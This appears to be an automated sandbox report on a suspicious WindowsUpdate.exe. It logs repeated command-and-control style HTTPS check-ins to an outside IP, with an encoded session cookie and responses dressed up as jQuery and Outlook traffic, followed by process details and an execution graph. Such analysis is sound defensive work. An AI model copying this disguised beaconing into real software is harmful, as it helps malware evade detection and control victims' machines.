Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 146.56.219.146 | 443 | 6652 | C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:29 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:30 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:30 UTC | 5537 | IN | Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 146.56.219.146 | 443 | 6652 | C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:36 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:37 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:37 UTC | 5537 | IN | Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72
Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:44 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:45 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:44 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:45 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:51 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:52:52 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:52 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:52:52 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:52:59 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:00 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:52:59 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:00 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49763 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:53:06 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:07 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:07 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:07 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49779 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:53:14 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:15 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:14 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:15 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49799 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:53:21 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:22 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:22 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:22 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49816 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:53:29 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:30 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:30 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49835 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:53:36 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:37 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:37 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:37 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 14 | Source IP: 192.168.2.4 | Source Port: 49853 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:53:43 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:44 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:44 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:44 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 15 | Source IP: 192.168.2.4 | Source Port: 49869 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:53:51 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:51 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:51 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:51 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Session ID: 16 | Source IP: 192.168.2.4 | Source Port: 49886 | Destination IP: 146.56.219.146 | Destination Port: 443 | PID: 6652 | Process: C:\Users\user\Desktop\WindowsUpdate.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 21:53:58 UTC | 431 | OUT | GET /assets/code-3d7b701fc6eb.css HTTP/1.1
Accept: */*
Content-Language: de-DE, en-CA
Cookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)
Host: 146.56.219.146
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-18 21:53:59 UTC | 595 | IN | HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 21:53:58 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/9.5
request-id: aad7f3fc-c5eb-4341-af6f-700981ac2539
X-CalculatedBETarget: BN3PR0701MB1156.namprd07.prod.outlook.com
X-Content-Type-Options: nosniff
X-OWA-Version: 14.1.1240.20
X-OWA-OWSVersion: V2017_06_15
X-OWA-MinimumSupportedOWSVersion: V2_6
X-Frame-Options: SAMEORIGIN
X-DiagInfo: BN4PR1812MB2267
X-UA-Compatible: IE=EmulateIE9
X-Powered-By: ASP.NET
X-FEServer: CY4PR02CA0010
Connection: close
Content-Length: 5537
2024-12-18 21:53:59 UTC | 5537 | IN | Data Ascii: /*! jQuery v3.6.0 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery r


Target ID: 0
Start time: 16:52:00
Start date: 18/12/2024
Path: C:\Users\user\Desktop\WindowsUpdate.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\WindowsUpdate.exe"
Imagebase: 0x7ff7300a0000
File size: 15'360 bytes
MD5 hash: 375049AE392572882D3402D0678389EF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false


    Execution Graph

    Execution Coverage: 1.5%
    Dynamic/Decrypted Code Coverage: 15.4%
    Signature Coverage: 19.2%
    Total number of Nodes: 26
    Total number of Limit Nodes: 4
    execution_graph 23128 217700e25b4 23131 217700e25c3 fread_s 23128->23131 23130 217700e25fd 23131->23130 23132 217700e2b70 RtlFreeHeap abort 23131->23132 23132->23130 23133 7ff7300a1b24 23134 7ff7300a1b3d __scrt_initialize_crt 23133->23134 23135 7ff7300a1b45 __scrt_acquire_startup_lock 23134->23135 23136 7ff7300a1c7b 23134->23136 23138 7ff7300a1c85 23135->23138 23143 7ff7300a1b63 __scrt_release_startup_lock 23135->23143 23158 7ff7300a21a8 9 API calls 23136->23158 23159 7ff7300a21a8 9 API calls 23138->23159 23140 7ff7300a1c90 23142 7ff7300a1c98 _exit 23140->23142 23141 7ff7300a1b88 23143->23141 23144 7ff7300a1c0e _get_initial_narrow_environment __p___argv __p___argc 23143->23144 23147 7ff7300a1c06 _register_thread_local_exe_atexit_callback 23143->23147 23153 7ff7300a1190 23144->23153 23147->23144 23149 7ff7300a1c37 23149->23140 23150 7ff7300a1c3b 23149->23150 23151 7ff7300a1c40 _cexit 23150->23151 23152 7ff7300a1c45 23150->23152 23151->23152 23152->23141 23156 7ff7300a11f1 23153->23156 23155 7ff7300a15ee 23157 7ff7300a22fc GetModuleHandleW 23155->23157 23160 7ff7300a1a20 8 API calls 2 library calls 23156->23160 23157->23149 23158->23138 23159->23140 23160->23155

    Control-flow Graph

    APIs
    Strings
    Memory Dump Source
